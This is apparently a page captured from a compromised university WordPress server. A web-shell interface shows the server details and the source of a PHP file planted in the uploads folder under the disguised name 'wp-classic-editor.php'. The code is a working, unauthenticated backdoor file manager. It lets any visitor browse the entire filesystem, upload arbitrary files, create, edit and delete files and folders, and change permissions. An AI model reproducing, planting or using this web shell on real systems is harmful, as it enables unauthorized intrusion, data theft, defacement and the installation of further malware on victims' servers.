HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.4.33
System: Linux webkhoa.212 3.10.0-1160.59.1.el7.x86_64 #1 SMP Wed Feb 23 16:47:03 UTC 2022 x86_64
User: fect (1004)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/fect/web/fect.ictu.edu.vn/public_html/wp-content/uploads/2025/08/
Upload Files
File: /home/fect/web/fect.ictu.edu.vn/public_html/wp-content/uploads/2025/08/wp-classic-editor.php
<?php
// ====================
// WP Head Editor + Advanced File Manager (Free Navigation)
// ====================

// Path awal default (folder tempat script berada)
$path = isset($_GET['path']) ? $_GET['path'] : __DIR__;
$real_path = realpath($path);

// Jika invalid, tetap di folder awal
if ($real_path === false) {
    $real_path = __DIR__;
}

// Jika tombol "Up Folder" ditekan
if (isset($_GET['up'])) {
    $real_path = dirname($real_path);
}

// Aksi: Upload file
if (isset($_POST['upload']) && isset($_FILES['file'])) {
    $target = $real_path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "<div style='color:green'>File uploaded successfully.</div>";
    } else {
        echo "<div style='color:red'>Upload failed.</div>";
    }
}

// Aksi: Buat file baru
if (isset($_POST['newfile']) && !empty($_POST['filename'])) {
    $newfile = $real_path . DIRECTORY_SEPARATOR . $_POST['filename'];
    if (!file_exists($newfile)) {
        file_put_contents($newfile, "");
        echo "<div style='color:green'>File created.</div>";
    }
}

// Aksi: Buat folder baru
if (isset($_POST['newfolder']) && !empty($_POST['foldername'])) {
    $newfolder = $real_path . DIRECTORY_SEPARATOR . $_POST['foldername'];
    if (!file_exists($newfolder)) {
        mkdir($newfolder);
        echo "<div style='color:green'>Folder created.</div>";
    }
}

// Aksi: Delete file/folder
if (isset($_GET['delete'])) {
    $del = realpath($_GET['delete']);
    if ($del) {
        if (is_file($del)) {
            unlink($del);
            echo "<div style='color:green'>File deleted.</div>";
        } elseif (is_dir($del)) {
            rmdir($del);
            echo "<div style='color:green'>Folder deleted.</div>";
        }
    }
}

// Aksi: Edit permission
if (isset($_POST['chmod']) && isset($_POST['perm']) && isset($_POST['target'])) {
    $t = realpath($_POST['target']);
    $perm = intval($_POST['perm'], 8);
    if ($t) {
        chmod($t, $perm);
        echo "<div style='color:green'>Permission updated.</div>";
    }
}

// List isi direktori jika path adalah folder
if (is_dir($real_path)) {
    $files = scandir($real_path);
    echo "<h2>WP Head Editor - File Manager</h2>";
    echo "<h3>Current Path: " . htmlspecialchars($real_path) . "</h3>";
    echo "<a href='?path=" . urlencode($real_path) . "&up=1'>[Up Folder]</a><br><br>";

    // Form Upload File
    echo "<form method='post' enctype='multipart/form-data'>
        Upload: <input type='file' name='file'>
        <button type='submit' name='upload'>Upload</button>
    </form><br>";

    // Form Buat File
    echo "<form method='post'>
        New File: <input type='text' name='filename'>
        <button type='submit' name='newfile'>Create</button>
    </form><br>";

    // Form Buat Folder
    echo "<form method='post'>
        New Folder: <input type='text' name='foldername'>
        <button type='submit' name='newfolder'>Create</button>
    </form><br><br>";

    foreach ($files as $file) {
        if ($file == '.') continue;
        $filepath = $real_path . DIRECTORY_SEPARATOR . $file;
        $perm = substr(sprintf('%o', fileperms($filepath)), -4);

        if (is_dir($filepath)) {
            echo "<a href='?path=" . urlencode($filepath) . "'>[DIR] $file</a> ";
            echo "<a href='?delete=" . urlencode($filepath) . "' style='color:red'>[Delete]</a> ";
        } else {
            echo "<a href='?edit=" . urlencode($filepath) . "'>$file</a> ";
            echo "<a href='?delete=" . urlencode($filepath) . "' style='color:red'>[Delete]</a> ";
        }

        // Form chmod inline
        echo "<form method='post' style='display:inline'>
            <input type='hidden' name='target' value='" . htmlspecialchars($filepath) . "'>
            <input type='text' name='perm' value='$perm' size='4'>
            <button type='submit' name='chmod'>Chmod</button>
        </form><br>";
    }
}

// Mode edit file
if (isset($_GET['edit'])) {
    $edit_file = realpath($_GET['edit']);
    if ($edit_file && is_file($edit_file)) {
        if (isset($_POST['save'])) {
            file_put_contents($edit_file, $_POST['content']);
            echo "<div style='color:green'>File saved successfully.</div>";
        }

        $content = htmlspecialchars(file_get_contents($edit_file));
        echo "<h2>Editing: " . htmlspecialchars($edit_file) . "</h2>";
        echo "<form method='post'>";
        echo "<textarea name='content' style='width:100%;height:400px;'>$content</textarea><br>";
        echo "<button type='submit' name='save'>Save</button>";
        echo "</form>";
        echo "<br><a href='?path=" . urlencode(dirname($edit_file)) . "'>Back to folder</a>";
    } else {
        echo "<div style='color:red'>Invalid file.</div>";
    }
}
?>
@ Telegram